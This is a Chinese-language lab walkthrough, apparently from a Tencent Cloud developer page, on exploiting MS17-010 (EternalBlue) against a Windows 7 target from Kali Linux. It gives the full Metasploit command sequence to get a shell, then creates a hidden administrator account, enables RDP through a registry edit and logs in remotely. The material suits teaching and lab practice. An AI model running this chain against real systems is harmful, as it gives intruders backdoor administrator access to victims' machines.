攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版
打开cmd查看ip地址
ipconfig
打开网络和共享中心
进入windows防火墙设置
成功关闭防火墙
在kali linux里
ping 192.168.137.130
在windows 7里
ping 192.168.137.128
两边都ping得通,说明通讯正常
运行postgresql数据库
service postgresql start
打开msf
msfconsole
使用相关模块
use auxiliary/scanner/smb/smb_ms17_010
查看相关配置信息
show options
设置目标IP为靶机的IP
set rhost 192.168.137.130
开始对靶机进行扫描
run
搜索msf17010漏洞模块
search ms17-010
使用该漏洞模块进行攻击
use exploit/windows/smb/ms17_010_eternalblue
查看其配置详情
show options
设置靶机IP
set rhost 192.168.137.130
使用exploit或者run命令进行攻击
exploit
获取shell
shell
创建管理员账户
net user pigpig 123456 /add
我们在win7那边已经可以看到了
增加管理员权限
net localgroup administrators pigpig /add
在去win7那边观察
将win7靶机那边远程服务打开
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
打开3389端口之后,在新的shell里
rdesktop 192.168.137.130:3389
点击yes之后,就可以在kali里面进入到win7靶机了。
输入账户密码回车,点了同意靶机的管理员账户就会掉线
成功进入了
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有